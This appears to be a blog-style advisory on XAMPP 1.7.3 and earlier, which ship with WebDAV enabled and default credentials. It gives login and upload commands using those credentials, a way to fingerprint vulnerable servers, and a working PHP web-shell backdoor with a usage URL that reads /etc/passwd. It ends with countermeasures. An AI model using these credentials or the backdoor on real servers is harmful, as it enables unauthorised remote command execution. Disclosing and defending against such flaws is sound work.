The WebDAV plugin for the Apache server included with XAMPP version 1.7.3 or lower is enabled by default.
 
Since WebDAV is an often overlooked/underutilized functionality of the server, the default credentials associated with the WebDAV account are most likely left unchanged by the server admin.
 
The security setup page for the XAMPP server does not mention that WebDAV is enabled by default or ask the server admin to change the default username & password. This poor design choice leads many instances of XAMPP to be vulnerable to remote attacks.
 
To test whether your XAMPP site has WebDAV enabled with default credentials, you can follow the instructions below:
COMMANDS
Linux:

1. download/install cadaver 

apt-get install cadaver 

2. login to the XAMPP server’s WebDAV folder 

cadaver http://<REMOTE HOST>/webdav/
user: wampp
pass: xampp

2. upload a file to the webdav folder

put /tmp/helloworld.txt

4. browse to your uploaded file

load URL, http://<REMOTE HOST>/webdav/helloworld.txt, in browser

SOFTWARE USED
Vulnerable software (Windows version) download:

PHP-based payload (acquired from BackTrack 5.1): 

<!– Simple PHP backdoor by DK (http://michaeldaw.org) –>
<?php
if(isset($_REQUEST[‘cmd’])){
echo “<pre>”;
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
echo “</pre>”;
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!–    http://michaeldaw.org   2006    –>

DETAILED INFORMATION
To identify the version of XAMPP running on a server, you can analyze the HTTP Header response for the apache server. The example below shows the HTTP Header of a server running XAMPP 1.7.3. Take care to notice the version of Apache that was included in this version of XAMPP. You can see that Apache v2.2.14 was joined with XAMPP v1.7.3. You can use this information to help identify what version of XAMPP is running on a given host. If the Apache version is 2.2.14 or below, then the XAMPP version is 1.7.3 or below. And if the XAMPP version is 1.7.3 or below, then the host is possibly vulnerable the WebDAV default credential design vulnerability. And if you find a server running Apache 2.2.14, you will need to determine if XAMPP is installed. You can determine if XAMPP is being used as a hosting solution by checking the XAMPP URL: http://localhost/xampp/. If an HTTP authentication window appears, most likely XAMPP is used on the server.

And once you identify an XAMPP installation of 1.7.3 or below, you can use the commands below in Linux to login and upload a file to the remote server with the default credentials.

To show the potential impact of this design vulnerability, an attacker could use the WebDAV account to upload a php-based payload for remote access to the hosting server. An example of such a payload is shown below.

COUNTERMEASURES
To fix the WebDAV default credentials vulnerability you can upgrade to the latest version of XAMPP, change the WebDAV username/password, or use a different hosting solution.  This design vulnerability was addressed in XAMPP v1.7.4, so that the WebDAV account is not enabled by default and the default password is randomized.
Advertisements